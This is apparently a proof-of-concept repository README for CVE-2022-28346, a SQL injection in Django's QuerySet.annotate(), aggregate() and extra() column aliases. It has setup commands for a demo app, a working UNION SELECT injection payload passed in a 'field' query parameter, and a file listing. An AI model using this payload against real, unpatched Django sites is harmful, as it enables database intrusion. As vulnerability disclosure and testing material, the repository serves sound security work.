An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.<h1 align="center">CVE-2022-28346 PoC <a href="https://twitter.com/intent/tweet?text=CVE-2022-28346 PoC : https://github.com/ahsentekdemir/CVE-2022-28346"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1>
### Impact:
- Potential SQL injection in QuerySet.annotate(), aggregate(), and extra().
## Installation
```
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
```
## PoC
```
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
```
## References
[CVE Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28346)
[Django](https://www.djangoproject.com/weblog/2022/apr/11/security-releases/)
[4.0K] /data/pocs/ae1f6781792de5129972f4c7ff3a3e0636727dc0
├── [4.0K] CVE_2022_28346
│ ├── [ 405] asgi.py
│ ├── [ 0] __init__.py
│ ├── [3.2K] settings.py
│ ├── [ 808] urls.py
│ └── [ 405] wsgi.py
├── [ 189] data.json
├── [ 0] __init__.py
├── [ 670] manage.py
├── [4.0K] poc
│ ├── [ 114] admin.py
│ ├── [ 138] apps.py
│ ├── [ 0] __init__.py
│ ├── [4.0K] migrations
│ │ ├── [ 615] 0001_initial.py
│ │ ├── [ 413] 0002_auto_20220515_0015.py
│ │ └── [ 0] __init__.py
│ ├── [ 178] models.py
│ ├── [ 60] tests.py
│ └── [ 359] views.py
├── [ 25K] poc.png
├── [2.1K] poetry.lock
├── [ 285] pyproject.toml
└── [ 815] README.md
3 directories, 21 files